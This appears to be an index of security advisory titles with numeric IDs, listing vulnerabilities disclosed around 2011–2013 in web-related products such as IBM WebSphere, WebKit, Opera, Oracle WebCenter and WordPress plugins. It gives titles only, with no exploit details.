[59247] IBM WebSphere Application Server CVE-2013-0541 Local Denial Of Service Vulnerability
[59246] IBM WebSphere Application Server CVE-2013-0565 Cross Site Scripting Vulnerability
[59132] Oracle WebCenter Sites CVE-2013-1509 HTTP Header Injection Vulnerability
[59122] Oracle WebCenter Content CVE-2013-1559 Remote Code Execution Vulnerability
[59112] Oracle WebCenter Capture CVE-2013-1516 Remote Code Execution Vulnerability
[59017] Drupal RESTful Web Services Module Denial of Service Vulnerability
[59008] Cisco IOS XE Bridge Domain Interface Remote Denial of Service Vulnerability
[58946] MiniWeb Directory Traversal and Arbitrary File Upload Vulnerabilities
[58940] PowerTCP WebServer for ActiveX 'DartWebserver.dll' Denial of Service Vulnerability
[58864] Opera Web Browser CVE-2013-3210 Information Disclosure Vulnerability
[58838] C2 WebResource 'File' Parameter Cross Site Scripting Vulnerability
[58834] Sophos Web Protection Appliance Multiple Cross Site Scripting Vulnerabilities
[58833] Sophos Web Protection Appliance CVE-2013-2641 Arbitrary File Disclosure Vulnerability
[58832] Sophos Web Protection Appliance CVE-2013-2642 Multiple Command Injection Vulnerabilities
[58801] jigbrowser+ for Android 'WebView' Class Information Disclosure Vulnerability
[58781] KNet Web Server Buffer Overflow Vulnerability
[58771] WordPress Feedweb Plugin 'wp_post_id' Parameter Cross Site Scripting Vulnerability
[58770] RoundCube Webmail 'generic_message_footer' Value Arbitrary File Access Vulnerability
[58738] Atmail WebMail CVE-2013-2585 Cross Site Scripting Vulnerability
[58720] OrionDB Web Directory Multiple Cross Site Scripting Vulnerabilities
[58648] IBM Lotus Domino 'webadmin.nsf' Cross Site Scripting Vulnerability
[58641] VxWorks Web Server CVE-2013-0716 Remote Denial of Service Vulnerability
[58603] askiaweb CVE-2013-0124 Multiple Cross Site Scripting Vulnerabilities
[58602] askiaweb CVE-2013-0123 Multiple SQL Injection Vulnerabilities
[58597] Linux Kernel Netlink Interface Multiple Information Disclosure Vulnerabilities
[58496] WebKit CVE-2013-0960 Unspecified Memory Corruption Vulnerability
[58495] WebKit CVE-2013-0961 Unspecified Memory Corruption Vulnerability
[58491] TIBCO Spotfire Web Player Cross Site Scripting and Security Bypass Vulnerabilities
[58472] Oracle GlassFish Web Space Server CVE-2012-1712 Directory Traversal Vulnerability
[58441] Web Cookbook Multiple Cross Site Scripting and SQL Injection Vulnerabilities
[58388] WebKit Type Confusion CVE-2013-0912 Remote Code Execution Vulnerability
[58255] IBM WebSphere Commerce CVE-2012-4855 Denial Of Service Vulnerability
[58252] Websense TRITON Unified Security Center Multiple Security Vulnerabilities
[58250] WebCalendar CVE-2013-1422 User Enumeration Weakness
[58204] Ganglia Web 'view_name' Parameter Cross Site Scripting Vulnerability
[58167] WebKit MathML Library CVE-2013-2268 Unspecified Security Vulnerability
[58138] SkunkWeb 'sw.log' Insecure File Permissions Vulnerability
[58132] Rix4Web 'dir_link' Parameter SQL Injection Vulnerability
[58126] webfs 'webfsd.log' Insecure File Permissions Vulnerability
[58092] Web Cookbook SQL Injection and Information Disclosure Vulnerabilities
[58084] Alt-N MDaemon WebAdmin Arbitrary Command Execution Vulnerability
[58076] Alt-N MDaemon WorldClient And WebAdmin Cross Site Request Forgery Vulnerability
[57939] IBM WebSphere Cast Iron Cloud Integration CVE-2013-0465 Unspecified Security Vulnerability
[57938] IBM WebSphere Message Broker Multiple Security Vulnerabilities
[57878] IBM Tivoli Application Dependency Discovery Manager Web UI Portal Multiple Security Vulnerabilities
[57870] Ganglia Web CVE-2013-0275 Multiple Cross Site Scripting Vulnerabilities
[57849] RoundCube Webmail Cross Site Scripting Vulnerability
[57839] IBM Netezza WebAdmin Multiple Security Vulnerabilities
[57773] Opera Web Browser TLS CVE-2013-1618 Information Disclosure Vulnerability
[57756] Opera Web Browser Use-After-Free Memory Corruption Vulnerability
[57680] Free Monthly Websites Multiple Security Bypass and Arbitrary File Upload Vulnerabilities
[57633] Opera Web Browser Prior to 12.13 Multiple Security Vulnerabilities
[57591] WebKit CVE-2013-0968 Unspecified Memory Corruption Vulnerability
[57590] WebKit CVE-2013-0959 Unspecified Memory Corruption Vulnerability
[57589] WebKit CVE-2013-0958 Unspecified Memory Corruption Vulnerability
[57588] WebKit CVE-2013-0956 Unspecified Memory Corruption Vulnerability
[57587] WebKit CVE-2013-0955 Unspecified Memory Corruption Vulnerability
[57586] WebKit CVE-2013-0954 Unspecified Memory Corruption Vulnerability
[57585] WebKit CVE-2013-0953 Unspecified Memory Corruption Vulnerability
[57584] WebKit CVE-2013-0952 Unspecified Memory Corruption Vulnerability
[57583] WebKit CVE-2013-0962 Cross Site Scripting Vulnerability
[57582] WebKit CVE-2013-0951 Unspecified Memory Corruption Vulnerability
[57581] WebKit CVE-2013-0950 Unspecified Memory Corruption Vulnerability
[57580] WebKit CVE-2013-0949 Unspecified Memory Corruption Vulnerability
[57576] WebKit CVE-2013-0948 Unspecified Memory Corruption Vulnerability
[57568] Cisco WebEx Social CVE-2013-1107 Information Disclosure Vulnerability
[57561] PHPWeby Free Directory Script 'contact.php' Multiple SQL Injection Vulnerabilities
[57538] Google Web Toolkit CVE-2012-5920 Cross Site Scripting Vulnerability
[57534] Cisco WebEx Social CVE-2012-6397 Cross Site Scripting Vulnerability
[57514] Perforce P4Web Multiple Cross Site Scripting Vulnerabilities
[57513] IBM WebSphere Application Server CVE-2013-0462 Security Bypass Vulnerability
[57512] IBM WebSphere Application Server CVE-2013-0459 Cross Site Scripting Vulnerability
[57511] WebYaST CVE-2012-0435 Hosts List Modification Information Disclosure Vulnerability
[57510] IBM WebSphere Application Server CVE-2013-0460 Cross-Site Request Forgery Vulnerability
[57509] IBM WebSphere Application Server CVE-2013-0461 Cross Site Scripting Vulnerability
[57508] IBM WebSphere Application Server CVE-2013-0458 Cross Site Scripting Vulnerability
[57503] Adult Webmaster PHP Starter Script Password Disclosure Vulnerability
[57498] myu-s and PHP WeblogSystem Unspecified Cross Site Scripting Vulnerability
[57489] Cisco WebEx Training Center CVE-2013-1109 Cross Site Request Forgery Vulnerability
[57488] Cisco WebEx Training Center CVE-2013-1110 Security Bypass Vulnerability
[57487] Cisco WebEx Training Center CVE-2013-1108 Security Bypass Vulnerability
[57452] Kent Web Access Report CVE-2012-5175 Cross-Site Scripting Vulnerability
[57442] Drupal RESTful Web Services Module Cross Site Request Forgery Vulnerability
[57434] Barracuda Web Application Firewall Unspecified HTML Injection Vulnerability
[57313] MochiWeb CVE-2012-5641 Directory Traversal Vulnerability
[57250] WeBid 'validate.php' Multiple SQL Injection Vulnerabilities
[57227] Advantech WebAccess HMI/SCADA Unspecified Cross Site Scripting Vulnerability
[57180] Website Baker Concert Calendar Add-on SQL Injection and Cross Site Scripting Vulnerabilities
[57178] Advantech WebAccess HMI/SCADA HTML Injection Vulnerability
[57143] PMSoftware Simple Web Server Directory Traversal Vulnerability
[57132] Opera Web Browser CVE-2012-6467 Multiple Open Redirection Vulnerabilities
[57125] Rugged Operating System Web UI Multiple Security Vulnerabilities
[57121] Opera Web Browser Prior to 12.10 SSL Certificate Validation Security Weakness
[57120] Opera Web Browser WebP Images Information Disclosure Vulnerability
[57027] Webkit CVE-2011-3071 Remote Code Execution Vulnerability
[57010] IBM WebSphere Application Server for z/OS Unspecified Arbitrary Command Execution Vulnerability
[56996] Kiwi Syslog Web Access Multiple SQL Injection Vulnerabilities
[56984] Opera Web Browser Repeated Attempts Site Access Address Bar URI Spoofing Vulnerability
[56980] Opera Web Browser Prior to 12.12 Information Disclosure Vulnerability
[56907] Citrix XenApp XML Service Interface CVE-2012-5161 Remote Code Execution Vulnerability
[56906] Cerberus FTP Server Web Admin Multiple HTML-Injection Vulnerabilities
[56871] Advantech Studio and Indusoft Web Studio 'NTWebServer.exe' Directory Traversal Vulnerability
[56832] Kent Web Access Report CVE-2012-5176 Unspecified Cross-Site Scripting Vulnerability
[56788] Opera Web Browser Memory Corruption Vulnerability
[56774] Multiple Fortinet FortiWeb Appliances Multiple Cross Site Scripting Vulnerabilities
[56763] OurWebFTP '/index.php' Multiple Cross Site Scripting Vulnerabilities
[56758] IBM WebSphere Message Broker File System Insecure File Permissions Vulnerability
[56720] Drupal Webmail Plus Module CVE-2012-5590 SQL Injection Vulnerability
[56693] WebSite X5 Evolution 9 Cross Site Scripting and Security Bypass Vulnerabilities
[56683] Beat Websites 'id' Parameter SQL Injection Vulnerability
[56668] Websense Proxy Filter Security Bypass Vulnerability
[56660] WordPress Webplayer Plugin 'id' Parameter SQL Injection Vulnerability
[56659] WordPress Zingiri Web Shop Plugin 'path' Parameter Arbitrary File Upload Vulnerability
[56617] IBM WebSphere DataPower XC10 Denial of Service and Security Bypass Vulnerabilities
[56615] BIGACE Web CMS Session Fixation Vulnerability
[56594] Opera Web Browser Buffer Overflow and Information Disclosure Vulnerabilities
[56593] IBM WebSphere Portal Theme Component 'LayerLoader.jsp' Directory Traversal Vulnerability
[56588] WeBid 'loader.php' Directory Traversal Vulnerability
[56570] WebKit Cross Site Scripting Filter 'XSSAuditor.cpp' Security Bypass Vulnerability
[56567] Media Player Classic WebServer Cross Site Scripting and Denial of Service Vulnerabilities
[56536] Drupal RESTful Web Services Module Cross Site Request Forgery Vulnerability
[56471] IBM WebSphere MQ Large Message Denial of Service Vulnerability
[56460] IBM WebSphere Application Server CVE-2012-4850 Remote Privilege Escalation Vulnerability
[56459] IBM WebSphere Application Server CVE-2012-3330 Denial Of Service Vulnerability
[56458] IBM WebSphere Application Server CVE-2012-4853 Cross-Site Request Forgery Vulnerability
[56451] Amazon Web Services SDK SSL Certificate Validation Security Bypass Vulnerability
[56444] Drupal Webform CiviCRM Integration Module Access Bypass Vulnerability
[56434] IcedTea-Web CVE-2012-4540 Heap Based Buffer Overflow Vulnerability
[56423] IBM WebSphere Application Server 'Liberty Profile' Cross Site Scripting Vulnerability
[56407] Opera Web Browser Prior to 12.10 Multiple Vulnerabilities
[56396] Multiple IBM WebSphere Products Security Bypass Vulnerability
[56387] Webmin 'real name' Field Cross Site Scripting Vulnerability
[56362] WebKit CVE-2012-3748 Remote Code Execution Vulnerability
[56349] Cisco Unified MeetingPlace Web Conferencing Buffer Overflow Vulnerability
[56336] Google Web Toolkit Unspecified Cross Site Scripting Vulnerability
[56314] libunity-webapps Use-After-Free Memory Corruption Vulnerability
[56305] WordPress Easy Webinar Plugin 'wid' Parameter SQL Injection Vulnerability
[56254] WebKit CVE-2012-3747 Unspecified Remote Code Execution Vulnerability
[56245] IBM Tivoli Monitoring Web Server HTTP TRACE/TRACK Methods Information Disclosure Vulnerability
[56167] libsocialweb CVE-2012-4511 Non-SSL Connection Man in The Middle Vulnerability
[56001] Oracle WebCenter Sites CVE-2012-3184 Remote Security Vulnerability
[55984] Oracle WebCenter Sites CVE-2012-3186 Remote Security Vulnerability
[55980] Oracle WebCenter Sites CVE-2012-3185 Remote Security Vulnerability
[55972] Oracle WebCenter Sites CVE-2012-3183 Remote Security Vulnerability
[55968] Oracle WebCenter Sites CVE-2012-5065 Local Security Vulnerability
[55946] LiteSpeed Web Server 'gtitle' parameter Cross Site Scripting Vulnerability
[55928] WebCalendar Multiple HTML Injection Vulnerabilities
[55913] WebTitan Multiple SQL Injection and Command Injection Vulnerabilities
[55904] WebTitan 'logs-x.php' Directory Traversal Vulnerability
[55871] Drupal Basic webmail Module Cross Site Scripting and Information Disclosure Vulnerabilities
[55866] Cisco WebEx WRF File Format Multiple Remote Memory Corruption Vulnerabilities
[55843] HotScan Interface CVE-2012-2624 Buffer Overflow Vulnerability
[55841] Siemens SIMATIC S7-1200 PLC 'web server' Component Cross Site Scripting Vulnerability
[55831] SolarWinds Web Help Desk Multiple HTML Injection Vulnerabilities
[55786] IBM WebSphere DataPower SOA Appliances XML Encryption Information Disclosure Vulnerability
[55770] JBoss Web Services W3C XML Encryption Standard Information Disclosure Vulnerability
[55769] IBM WebSphere Commerce User Data Information Disclosure Vulnerability
[55761] PowerTCP WebServer for ActiveX CVE-2012-3819 Denial of Service Vulnerability
[55703] Opera Web Browser Unspecified Denial of Service Vulnerability
[55684] IBM WebSphere Commerce Enterprise REST Services Security Bypass Vulnerability
[55683] IBM WebSphere Commerce Enterprise Remote Denial of Service Vulnerability
[55678] IBM WebSphere Application Server for z/OS Multiple Security Vulnerabilities
[55671] IBM WebSphere Application Server for z/OS Local Security Bypass Vulnerability
[55670] IBM WebSphere MQ Remote Denial of Service Vulnerability
[55648] Novell GroupWise HTTP Interfaces Directory Traversal Vulnerability
[55631] WebKit for Apple iOS 6 for Developer Remote Information Disclosure Vulnerability
[55593] osCommerce PayPal Website Payments Standard Module Security Bypass Vulnerability
[55568] webERP 'WO' Parameter SQL Injection Vulnerability
[55567] FreeWebshop Multiple SQL Injection and Cross Site Scripting Vulnerabilities
[55534] WebKit Multiple Unspecified Memory Corruption Vulnerabilities
[55521] IBM WebSphere MQ .NET 'userid' and 'password' Information Disclosure Vulnerability
[55512] Webify Photo Gallery Arbitrary File Deletion Vulnerability
[55511] Webify Business Directory Arbitrary File Deletion Vulnerability
[55510] Webify eDownloads Cart Arbitrary File Deletion Vulnerability
[55496] Webify Blog Arbitrary File Deletion Vulnerability
[55465] Honeywell HMIWeb Browser ActiveX Control Remote Buffer Overflow Vulnerability
[55446] Webmin Multiple Input Validation Vulnerabilities
[55426] web@all Local File Include and Multiple Arbitrary File Upload Vulnerabilities
[55394] Barracuda Web Filter Authentification Module Multiple HTML Injection Vulnerabilities
[55387] Wiki Web Help 'configpath' Parameter Remote File Include Vulnerability
[55345] Opera Web Browser CVE-2012-4010 Address Bar URI Spoofing Vulnerability
[55309] IBM WebSphere Application Server Administrative Access Security Bypass Vulnerability
[55301] Opera Web Browser Prior to 12.02 Remote Code Execution Vulnerability
[55259] Wordpress HD Webplayer Plugin Multiple SQL Injection Vulnerabilities
[55257] Mozilla Firefox/Thunderbird Web Console CVE-2012-3980 Remote Code Execution Vulnerability
[55251] Mono ASP.NET Web Form Hash Collision Denial Of Service Vulnerability
[55229] Wiki Web Help Multiple HTML Injection Vulnerabilities
[55220] Web Wiz Forums Multiple Cross-Site Scripting Vulnerabilities
[55211] Wireshark Remote Interfaces Buffer Overflow Vulnerability
[55207] PHP Web Scripts Easy Banner Pro 'page' Parameter Local File Include Vulnerability
[55205] PHP Web Scripts Text Exchange Pro 'page' Parameter Local File Include Vulnerability
[55203] PHP Web Scripts Ad Manager Pro Multiple HTML Injection and SQL Injection Vulnerabilities
[55201] WebPA Multiple Security Vulnerabilities
[55194] Websense Content Gateway Multiple Cross Site Scripting Vulnerabilities
[55189] PHP Web Scripts Ad Manager Pro 'page' Parameter Local File Include Vulnerability
[55184] McAfee Email and Web Security Appliance and Email Gateway Multiple Vulnerabilities
[55176] web@all Multiple Input Validation Vulnerabilities
[55156] MediaSpan Website Management HTML Injection Vulnerability
[55149] IBM WebSphere Application Server Administration Console Cross Site Scripting Vulnerability
[55119] GREE Multiple Android Applications 'WebView' Class Information Disclosure Vulnerability
[55107] Gwebmail Multiple Input Validation Vulnerabilities
[55102] Hivemail Webmail Multiple HTML Injection Vulnerabilities
[55098] Hupa Webmail 'href' Attribute Multiple HTML Injection Vulnerabilities
[55097] WordPress Zingiri Web Shop Plugin 'index.php' Script Multiple SQL Injection Vulnerabilities
[55083] T-dah Webmail Client Multiple HTML Injection Vulnerabilities
[55080] WeBid 'getthumb.php' Remote File Disclosure Vulnerability
[55077] WeBid Remote File Include and SQL Injection Vulnerabilities
[55067] RoundCube Webmail Larry Skin HTML injection Vulnerability
[55051] RoundCube Webmail 'href' Email Body HTML Injection Vulnerability
[54983] IBM WebSphere MQ 'Web Gateway' Component Multiple Security Vulnerabilities
[54893] T-dah Webmail Client HTML Injection Vulnerability
[54892] Wespa Digital WespaJuris 'webshell.php' SQL Injection Vulnerabilities
[54882] Inout Webmail Multiple HTML Injection Vulnerabilities
[54845] Dir2web Multiple Security Vulnerabilities
[54819] IBM WebSphere Application Server Unspecified Cross Site Scripting Vulnerability
[54817] PolarisCMS 'WebForm_OnSubmit()' Function Cross Site Scripting Vulnerability
[54812] Worksforweb iAuto Multiple Cross Site Scripting and HTML Injection Vulnerabilities
[54788] Opera Web Browser Cross Site Scripting Sanitizer Security Bypass Vulnerability
[54782] Opera Web Browser Prior to 12.01 Remote Code Execution Vulnerability
[54780] Opera Web Browser Unspecified Security Vulnerability
[54779] Opera Web Browser HTML Injection Vulnerability
[54762] IcedTea-Web Multiple Arbitrary Code Execution Vulnerabilities
[54735] Dr. Web Enterprise Security Suite 'username' Field HTML Injection Vulnerability
[54721] Symantec Web Gateway 'deptUploads_data.php' SQL Injection Vulnerability
[54703] WebKit SVG Images CVE-2012-3650 Uninitialized Memory Information Disclosure Vulnerability
[54700] WebKit WebSockets CVE-2012-3696 HTTP Header Injection Vulnerability
[54697] WebKit CVE-2012-3697 Sandbox Security Bypass Weakness
[54696] WebKit Drag and Drop CVE-2012-3690 Cross-Origin Information Disclosure Vulnerability
[54695] WebKit CVE-2012-3695 Cross-Site Scripting Vulnerability
[54694] WebKit CVE-2012-3694 Information Disclosure Vulnerability
[54693] WebKit International CVE-2012-3693 Domain Name URI Spoofing Vulnerability
[54687] WebKit CVE-2012-3691 Cross Origin Information Disclosure Vulnerability
[54686] WebKit CVE-2012-3689 Cross Origin Information Disclosure Vulnerability
[54680] WebKit Multiple Unspecified Remote Code Execution Vulnerabilities
[54664] IBM WebSphere MQ SVRCONN Channel Security Bypass Vulnerability
[54618] Oxide WebServer Character Handling Denial Of Service Vulnerability
[54609] OSIsoft PI OPC DA Interface Remote Stack Based Buffer Overflow Vulnerability
[54605] PMSoftware Simple Web Server Remote Buffer Overflow Vulnerability
[54592] Dr. Web Anti-Virus for Android Information Disclosure Vulnerability
[54515] Oracle Sun Products Suite CVE-2012-1738 Remote Oracle iPlanet Web Server Vulnerability
[54488] Yahoo! Browser for Android 'WebView' Class Information Disclosure Vulnerability
[54466] web@all 'name' Parameter Cross Site Scripting Vulnerability
[54463] WebsiteBaker 'lang' Cross Site Scripting Vulnerability
[54442] WebPagetest Multiple Input Validation Vulnerabilities
[54430] Symantec Web Gateway Password Change Security Bypass Vulnerability
[54429] Symantec Web Gateway CVE-2012-2957 Local File Manipulation Authentication Bypass Vulnerability
[54427] Symantec Web Gateway CVE-2012-2976 Code Injection Vulnerability
[54426] Symantec Web Gateway CVE-2012-2953 Remote Shell Command Execution Vulnerability
[54425] Symantec Web Gateway CVE-2012-2961 SQL Injection Vulnerability
[54424] Symantec Web Gateway CVE-2012-2574 SQL Injection Vulnerability
[54349] IBM WebSphere Portal Dojo Module Directory Traversal Vulnerability
[54346] WebsitePanel 'ReturnUrl' Parameter URI Redirection Vulnerability
[54336] Eclydre Web Manager 'upload.php' Arbitrary File Upload Vulnerability
[54323] Kent Web YY-BOARD Unspecified Cross Site Scripting Vulnerability
[54310] Webify Link Directory 'id' Parameter SQL Injection Vulnerability
[54287] Webmatic 'Referer:' Field SQL Injection Vulnerability
[54257] WordPress Zingiri Web Shop Plugin 'abspath' Parameter Remote File Include Vulnerability
[54243] SpecView Web Server Directory Traversal Vulnerability
[54236] webERP Multiple Remote and Local File Include Vulnerabilities
[54213] Cisco WebEx WRF and ARF File Format Multiple Remote Buffer Overflow Vulnerabilities
[54200] WordPress Website FAQ 'website-faq-widget.php' SQL Injection Vulnerability
[54198] RoundCube Webmail CVE-2012-1253 Cross Site Scripting Vulnerability
[54178] WEBO Software WEBO Site SpeedUp 'wss_lang' Parameter Local File Include Vulnerability
[54109] web@all Cross Site Scripting and Cross Site Request Forgery Vulnerabilities
[54068] Western Digital ShareSpace WEB GUI Information Disclosure Vulnerability
[54051] IBM WebSphere Application Server 'iehs.war' Cross Site Scripting Vulnerability
[54045] Webify Multiple Products Multiple HTML Injection and Local File Include Vulnerabilities
[54035] Dolphin Browser HD for Android 'WebView' Class Information Disclosure Vulnerability
[54020] WordPress Zingiri Web Shop Plugin 'uploadfilexd.php' Arbitrary File Upload Vulnerability
[54019] TinyWebGallery CVE-2012-2932 Multiple Cross-Site Scripting Vulnerabilities
[54011] Opera Web Browser Prior to 11.65 Multiple Vulnerabilities
[53982] Quest Webthority Cross Site Request Forgery Vulnerability
[53904] webSPELL Dailyinput Movie-Addon 'portal' Parameter SQL Injection Vulnerability
[53902] HP Web Jetadmin Multiple Unspecified Cross Site Scripting Vulnerabilities
[53890] webSPELL FIRSTBORN Movie-Addon 'id' Parameter SQL Injection Vulnerability
[53859] IBM WebSphere Sensor Events Multiple Input Validation Vulnerabilities
[53808] Multiple Browsers WebGL Implementation Linux NVIDIA Driver 'glBufferData()' Security Vulnerability
[53783] @WEB ShoppingCart Unspecified Cross Site Scripting Vulnerability
[53762] WebKit Cross Site Scripting Filter Security Bypass Vulnerability
[53755] IBM WebSphere Application Snoop Servlets Information Disclosure Vulnerability
[53749] Simple Web Content Management System Multiple SQL Injection Vulnerabilities
[53715] Bloxx Web Filter Multiple Remote Security Vulnerabilities
[53619] iLunascape for Android 'WebView' Class Information Disclosure Vulnerability
[53612] Tornado 'tornado.web.RequestHandler.set_header()' HTTP Response Splitting Vulnerability
[53600] Epicor Returns Management SOAP Interface SQL Injection Vulnerability
[53565] 3DVIA Player WebPlayer ActiveX Control Multiple Buffer Overflow Vulnerabilities
[53541] Kent WEB MART CVE-2012-1247 Cross Site Scripting Vulnerability
[53539] Kent WEB MART Handling Cookies Cross Site Scripting Vulnerability
[53474] Opera Web Browser Prior to 11.64 Remote Code Execution Vulnerability
[53460] Kerio WinRoute Firewall Web Server Remote Source Code Disclosure Vulnerability
[53453] Roundcube Webmail Information Disclosure Vulnerability
[53446] WebKit CVE-2012-0676 Security Bypass Vulnerability
[53444] Symantec Web Gateway Remote Shell Command Execution Vulnerability
[53443] Symantec Web Gateway Management Scripts Arbitrary File Upload Vulnerability
[53442] Symantec Web Gateway Arbitrary File Download And Delete Vulnerability
[53435] Horde IMP Webmail Client Multiple Cross Site Scripting Vulnerabilities
[53407] WebKit CVE-2011-3056 Cross Origin Information Disclosure Vulnerability
[53404] WebKit CVE-2012-0672 Unspecified Memory Corruption Vulnerability
[53396] Symantec Web Gateway 'l' Parameter Cross Site Scripting Vulnerability
[53318] WordPress Zingiri Web Shop Plugin HTML Injection Vulnerabilities
[53283] XPhone Unified Communications (UC) Web Multiple HTML Injection Vulnerabilities
[53278] WordPress Zingiri Web Shop Plugin HTML Injection and Cross Site Scripting Vulnerabilities
[53263] ACTi Web Configurator 'cgi-bin' Directory Traversal Vulnerability
[53211] School Website Solutions Multiple Cross Site Scripting Vulnerabilities
[53207] WebCalendar Local File Include and PHP Code Injection Vulnerabilities
[53194] RETIRED: IBM Tivoli Directory Server Web Admin Tool Unspecified Cross Site Scripting Vulnerability
[53171] ReadyDesk Customer Interface Multiple HTML Injection Vulnerabilities
[53148] WebKit Array.Splice Method Remote Code Execution Vulnerability
[53133] Oracle Sun Products Suite CVE-2012-0516 Remote Oracle iPlanet Web Server Vulnerability
[53118] Oracle GlassFish Enterprise Server 'REST interface' Cross Site Request Forgery Vulnerability
[53082] Oracle WebCenter Forms Recognition 'CroScPlt.dll' ActiveX Control Insecure Method Vulnerability
[53062] Oracle WebCenter Forms Recognition 'Sssplt30.ocx' ActiveX Control Remote Code Execution Vulnerability
[53029] Fastpath WebChat Multiple Fields Multiple HTML Injection Vulnerabilities
[53015] McAfee Web Gateway 'Host' HTTP Header Security Bypass Vulnerability
[52981] Cisco IronPort Web Security Appliance Multiple Security Bypass Vulnerabilities
[52956] WebKit SVG Tags CVE-2011-3928 Use-After-Free Remote Code Execution Vulnerability
[52936] ISPConfig 'webdav_user_edit.php' Security Bypass Vulnerability
[52882] Cisco WebEx WRF File Format Multiple Remote Buffer Overflow Vulnerabilities
[52844] IBM Tivoli Directory Server Web Admin Tool Cross Site Scripting Vulnerability
[52731] Opera Web Browser Prior to 11.62 Multiple Security Vulnerabilities
[52727] FreePBX Recordings Interface Remote Code Execution Vulnerability
[52724] IBM WebSphere Application Server 'SSLClientAuth' Security Bypass Vulnerability
[52723] IBM WebSphere Application Server Virtual Member Manager Security Bypass Vulnerability
[52722] IBM WebSphere Application Server Administration Console Cross Site Scripting Vulnerability
[52721] IBM WebSphere Application Server Administration Console Cross Site Scripting Vulnerability
[52651] WebGlimpse 'DOC' Parameter Directory Traversal Vulnerability
[52647] WebGlimpse 'DOC' Parameter Cross Site Scripting Vulnerability
[52646] WebGlimpse 'wgarcmin.cgi' Path Disclosure Vulnerability
[52644] Webgrind 'file' Parameter Directory Traversal Vulnerability
[52627] WebGlimpse 'webglimpse.cgi' Remote Command Injection Vulnerability
[52571] Dell Webcam 'crazytalk4.ocx' ActiveX Multiple Buffer Overflow Vulnerabilities
[52560] Dell Webcam Center 'CrazyTalk4Native.dll' ActiveX Multiple Buffer Overflow Vulnerabilities
[52487] McAfee Email and Web Security Appliance and Email Gateway Multiple Vulnerabilities
[52445] GoAhead WebServer HTTP Requests Denial Of Service Vulnerability
[52423] WebKit Private Browsing 'Block cookies' Security Bypass Vulnerability
[52421] WebKit HTTP Authentication Credentials Information Disclosure Vulnerability
[52418] Aurora WebOPAC 'txtEmailAliasBarcode' Parameter SQL Injection Vulnerability
[52367] WebKit Multiple Unspecified Cross Site Scripting Vulnerabilities
[52365] WebKit Multiple Unspecified Memory Corruption Vulnerabilities
[52363] WebKit Multiple Unspecified Memory Corruption Vulnerabilities
[52348] Promise WebPAM Multiple Input Validation Vulnerabilities
[52345] Drupal Webform Module Radio Buttons Checkboxes HTML Injection Vulnerability
[52335] Webfolio CMS Multiple HTML Injection Vulnerabilities
[52288] Blackberry WebKit Browser Engine Remote Code Execution Vulnerability
[52250] IBM WebSphere Application Server for z/OS JAX-RPC Unspecified Remote Security Vulnerability
[52220] Cisco Wireless LAN Controller CVE-2012-0370 'WebAuth' Denial of Service Vulnerability
[52218] Webfolio CMS Cross Site Request Forgery Vulnerability
[52189] Cookpad and Cookpad Noseru for Android 'WebView' Class Information Disclosure Vulnerability
[52170] Webglimpse Multiple Cross Site Scripting Vulnerabilities
[52119] WebcamXP and Webcam7 Directory Traversal Vulnerability
[52116] Unity Web Player Heap Memory Corruption Vulnerability
[52104] IBM WebSphere Lombardi Edition 'Coach' Script HTML Injection Vulnerability
[52087] WebsiteBaker HTTP 'Referer' Header Cross Site Scripting Vulnerabilities
[52068] webgrind 'dataFile' Parameter Cross Site Scripting Vulnerability
[52064] SecureSphere Web Application Firewall Username HTML Injection Vulnerability
[52051] Advantech WebAccess Multiple Remote Vulnerabilities
[52050] Citrix XenServer Web Self Service Multiple Unspecified Vulnerabilities
[51991] STHS v2 Web Portal 'team' Parameter Multiple SQL Injection Vulnerabilities
[51941] Advantech BroadWin WebAccess Remote Code Execution Vulnerability
[51934] Microsoft SharePoint 'themeweb.aspx' Cross Site Scripting Vulnerability
[51865] PHP-Fusion 'weblink_id' Parameter SQL Injection Vulnerability
[51843] TYPO3 Webservices Extension Unspecified Remote Code Execution Vulnerability
[51836] Siemens SIMATIC WinCC HMI Web Server Multiple Input Validation Vulnerabilities
[51829] JBoss Web CVE-2011-4610 Remote Denial of Service Vulnerability
[51820] SphinxSoftware Mobile Web Server Multiple HTML Injection Vulnerabilities
[51762] FishEye and Crucible Webwork 2 Framework Remote Code Injection Vulnerability
[51676] NX Web Companion Applet Handling Arbitrary Code Execution Vulnerability
[51666] NeoAxis Web Player Zip File Directory Traversal Vulnerability
[51648] Opera Web Browser Prior to 11.61 Information Disclosure and Security Bypass Vulnerabilities
[51644] Stoneware webNetwork Cross Site Request Forgery and HTML Injection Vulnerabilities
[51615] WordPress AllWebMenus Plugin 'actions.php' Arbitrary File Upload Vulnerability
[51607] Savant Web Server Remote Buffer Overflow Vulnerability
[51600] WebCalendar 'location' Variable Cross Site Scripting Vulnerability
[51560] IBM WebSphere Application Server SibRaRecoverableSiXaResource Information Disclosure Vulnerability
[51559] IBM WebSphere Application Server Prior to 6.1.0.41 Cross Site Scripting Vulnerability
[51471] Oracle Web Services Manager CVE-2011-3531 Remote Oracle Web Services Manager Vulnerability
[51469] Oracle Weblogic Server CVE-2011-3566 Remote Security Vulnerability
[51463] Oracle Web Services Manager CVE-2011-3568 Remote Oracle Web Services Manager Vulnerability
[51460] Oracle Fusion Middleware CVE-2012-0077 Remote Oracle WebLogic Server Vulnerability
[51454] Oracle Fusion Middleware CVE-2012-0084 Remote Oracle WebCenter Content Vulnerability
[51451] Oracle Fusion Middleware CVE-2012-0083 Remote Oracle WebCenter Content Vulnerability
[51441] IBM WebSphere Application Server Hash Collision Denial Of Service Vulnerability
[51435] WebTitan Appliance Multiple HTML Injection Vulnerabilities
[51420] IBM WebSphere Application Server 'iscdeploy' Script Insecure File Permissions Vulnerability
[51418] PHP Ringtone Website 'ringtones.php' Multiple Cross Site Scripting Vulnerabilities
[51414] IBM WebSphere Application Server z/OS Cross Site Scripting and Unspecified Vulnerabilities
[51345] IBM WebSphere Application Server Community Edition Tomcat Container Denial Of Service Vulnerability
[51325] TinyWebGallery Multiple Remote Command Execution Vulnerabilities
[51314] MangosWeb Enhanced 'Login' Field SQL Injection Vulnerability
[51313] Atmail Webmail Multiple HTML Injection Vulnerabilities
[51303] Atmail Webmail Multiple HTML Injection Vulnerabilities
[51246] IBM Web Experience Factory Smart Refresh HTML Injection Vulnerability
[51210] Akiva WebBoard 'name' Parameter SQL Injection Vulnerability
[51193] PHP Web Form Hash Collision Denial Of Service Vulnerability
[51180] cApexWEB 'dfuserid' and 'dfpassword' Parameters Multiple SQL Injection Vulnerabilities
[51109] WebSVN 'path' Parameter Multiple Cross Site Scripting Vulnerabilities
[51088] Websense Triton 'favorites.exe' HTML Injection Vulnerability
[51087] Multiple Websense Products 'favorites.exe' Authentication Bypass Vulnerability
